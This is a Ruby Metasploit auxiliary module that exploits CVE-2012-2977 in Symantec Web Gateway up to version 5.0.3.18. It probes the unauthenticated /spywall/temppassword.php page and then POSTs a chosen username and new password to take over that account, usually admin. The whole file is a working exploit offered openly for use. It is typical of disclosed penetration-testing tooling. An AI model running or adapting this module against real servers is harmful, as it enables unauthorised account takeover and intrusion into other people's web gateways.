##
# @_Kc57
# Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change",
'Description' => %q{
This module will change the password for the specified account on a Symantec Web Gatewaye server.
},
'License' => MSF_LICENSE,
'Version' => "$Revision: 0 $",
'Author' =>
[
'Kc57',
],
'References' =>
[
[ 'CVE', '2012-2977' ],
[ 'OSVDB', '0' ],
[ 'BID', '54430' ],
[ 'URL', 'http://www.securityfocus.com/bid/54430' ],
],
'DisclosureDate' => "Jul 23 2012" ))
register_options(
[
Opt::RPORT(80),
OptString.new('USER', [ true, 'The password to reset to', 'admin']),
OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin'])
], self.class)
end
def run
print_status("Attempting to connect to https://#{rhost}/spywall/temppassword.php to reset password")
res = send_request_raw(
{
'method' => 'POST',
'uri' => '/spywall/temppassword.php',
}, 25)
#check to see if we get HTTP OK
if (res.code == 200)
print_status("Okay, Got an HTTP 200 (okay) code. Checking if exploitable")
else
print_error("Did not get HTTP 200, URL was not found. Exiting!")
return
end
#Check to if the temppassword.php page loads or if we are redirected to the login page
if (res.body.match(/Please Select a New Password/i))
print_status("Server is vulnerable!")
else
print_error("Target doesn't seem to be vulnerable!")
return
end
print_status("Attempting to exploit password change vulnerability on #{rhost}")
print_status("Attempting to reset #{datastore['USER']} password to #{datastore['PASSWORD']}")
data = 'target=executive_summary.php'
data << '&USERNAME=' + datastore['USER']
data << '&password=' + datastore['PASSWORD']
data << '&password2=' + datastore['PASSWORD']
data << '&Save=Save'
res = send_request_cgi(
{
'method' => 'POST',
'uri' => '/spywall/temppassword.php',
'data' => data,
}, 25)
if res.code == 200
if (res.body.match(/Thank you/i))
print_status("Password reset was successful!\n")
else
print_error("Password reset failed! User '#{datastore['USER']}' may not exist.\n")
end
else
print_error("Password reset failed!")
end
end
end